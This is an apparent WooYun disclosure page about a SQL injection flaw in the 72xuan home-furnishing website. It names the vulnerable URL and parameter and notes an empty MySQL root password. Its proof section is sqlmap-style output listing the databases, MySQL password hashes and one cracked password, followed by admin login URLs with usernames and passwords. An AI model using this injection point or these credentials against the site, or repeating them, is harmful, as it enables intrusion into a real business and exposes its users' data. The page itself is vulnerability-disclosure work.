当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-020119

漏洞标题:72xuan家居网SQL爆菊

相关厂商:72xuan家居网

漏洞作者: 范特西

提交时间:2013-03-15 20:35

修复时间:2013-06-14 10:45

公开时间:2013-06-14 10:45

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:13

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-03-15: 积极联系厂商并且等待厂商认领中,细节不对外公开
2013-06-14: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

无过滤导致注入

详细说明:

权6
mysql注入点
http://www.72xuan.com/cms/console/zhuantipinglun.php?pagesize=10&zhuanti_id=1
root空密码等等...
可进一步渗透。懒得了 。。

漏洞证明:

available databases [17]:
[*] 72xuan
[*] 72xuan_bbs
[*] 72xuan_cms
[*] 72xuan_count
[*] 72xuan_home
[*] 72xuan_kantugou
[*] 72xuan_new
[*] 72xuan_picture
[*] 72xuan_product
[*] 72xuan_uc
[*] 72xuan_ucenter
[*] cacti
[*] information_schema
[*] ktg_temp
[*] logs
[*] mysql
[*] test
database management system users password hashes:
[*] backup [1]:
password hash: *4DB80E3C5A30866BBB97AF9ADA6EF3425DB59EE8
[*] cacti [1]:
password hash: *59C70DA2F3E3A5BDF46B68F5C8B8F25762BCCEF0
clear-text password: passwd
[*] cms [1]:
password hash: *4DB80E3C5A30866BBB97AF9ADA6EF3425DB59EE8
[*] count [1]:
password hash: *4DB80E3C5A30866BBB97AF9ADA6EF3425DB59EE8
[*] home [1]:
password hash: *4DB80E3C5A30866BBB97AF9ADA6EF3425DB59EE8
[*] kantugou [1]:
password hash: *4DB80E3C5A30866BBB97AF9ADA6EF3425DB59EE8
[*] main [1]:
password hash: *4DB80E3C5A30866BBB97AF9ADA6EF3425DB59EE8
[*] nagios [1]:
password hash: *4DB80E3C5A30866BBB97AF9ADA6EF3425DB59EE8
[*] newuser [1]:
password hash: *4DB80E3C5A30866BBB97AF9ADA6EF3425DB59EE8
[*] picture [1]:
password hash: *4DB80E3C5A30866BBB97AF9ADA6EF3425DB59EE8
[*] product [1]:
password hash: *4DB80E3C5A30866BBB97AF9ADA6EF3425DB59EE8
[*] root [1]:
password hash: NULL
[*] uc [1]:
password hash: *4DB80E3C5A30866BBB97AF9ADA6EF3425DB59EE8
[*] uc_old [1]:
password hash: *4DB80E3C5A30866BBB97AF9ADA6EF3425DB59EE8
[*] view [1]:
password hash: *4DB80E3C5A30866BBB97AF9ADA6EF3425DB59EE8
http://admin.72xuan.com:9080/analysis/72xuan_analysis_console.jsp user:[email protected]
passwd:72xuanNB88
http://www.72xuan.com/foreground/console/xuanmana/login.jsp
user:72xuan
passwd:Dota72$manager

修复方案:

过滤,容错。

版权声明:转载请注明来源 范特西@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝